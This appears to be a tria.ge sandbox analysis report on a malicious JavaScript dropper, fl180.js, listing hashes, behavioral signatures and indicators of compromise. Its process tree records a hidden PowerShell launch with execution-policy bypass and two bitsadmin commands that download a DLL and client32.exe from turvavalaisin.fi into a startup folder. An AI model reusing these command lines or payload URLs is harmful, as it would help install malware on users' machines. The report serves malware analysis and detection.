Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
45s -
max time network
48s -
platform
windows7_x64 -
resource
win7-20230703-en -
resource tags
arch:x64arch:x86image:win7-20230703-enlocale:en-usos:windows7-x64system -
submitted
08/07/2023, 08:29
Static task
static1
Behavioral task
behavioral1
Sample
fl180.js
Resource
win7-20230703-en
Behavioral task
behavioral2
Sample
fl180.js
Resource
win10v2004-20230703-en
General
-
Target
fl180.js
-
Size
45KB
-
MD5
de3d0a48c7a6b6552922f4e88c55bf83
-
SHA1
2647c35cd861b225df8a6b34cb33724fce914a03
-
SHA256
d720c060a4057004961c8af319f08d30b286cd3639d0fc0429c26c3d7319991a
-
SHA512
1edb43bfdc0d682343994169c762465080c700dfa78d581ba864755c884eb9002112b25e906033c9e5b2d7194dfa53e22457cc6047c390a0cc03db68ec50b928
-
SSDEEP
768:JxyIPOhAwthDONQD2jjAHYH3GQuhKYNfHavg90dSDorycM8L:Jx0AwTDOC2j8W3GQuhKYNf6vgydko2cB
Malware Config
Extracted
https://turvavalaisin.fi/loco.zip
https://turvavalaisin.fi/files/
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Download via BitsAdmin 1 TTPs 2 IoCs
pid Process 2100 bitsadmin.exe 812 bitsadmin.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2404 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2404 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 2184 wrote to memory of 2404 2184 wscript.exe 29 PID 2184 wrote to memory of 2404 2184 wscript.exe 29 PID 2184 wrote to memory of 2404 2184 wscript.exe 29 PID 2404 wrote to memory of 2100 2404 powershell.exe 31 PID 2404 wrote to memory of 2100 2404 powershell.exe 31 PID 2404 wrote to memory of 2100 2404 powershell.exe 31 PID 2404 wrote to memory of 812 2404 powershell.exe 32 PID 2404 wrote to memory of 812 2404 powershell.exe 32 PID 2404 wrote to memory of 812 2404 powershell.exe 32
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\fl180.js1⤵
- Suspicious use of WriteProcessMemory
PID:2184 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle hidden -File C:\Users\Admin\AppData\Local\Temp\rjribr2.ps12⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2404 -
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://turvavalaisin.fi/files/AudioCapture.dll C:\Users\Admin\AppData\RoamingOfficeStartupAudioCapture.dll3⤵
- Download via BitsAdmin
PID:2100
-
-
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://turvavalaisin.fi/files/client32.exe C:\Users\Admin\AppData\RoamingOfficeStartupclient32.exe3⤵
- Download via BitsAdmin
PID:812
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD59cf347f03513bd9be1a3244435aa0c2f
SHA14993c7374edcf81180753534cf03ff07648c140b
SHA2569021259bb4d1de30103c74ab7da2ee868f3223a4dcaa9ffaa795b5a4b6b26812
SHA512ce267d8dfb48dbc80457a20fede0b5f728579677c82b6cf8321ac4fcee0062a1c2049ca47ec3a01e8c9e2a442a28caaf2471fc1bf630ecf62b98950f1deb90c3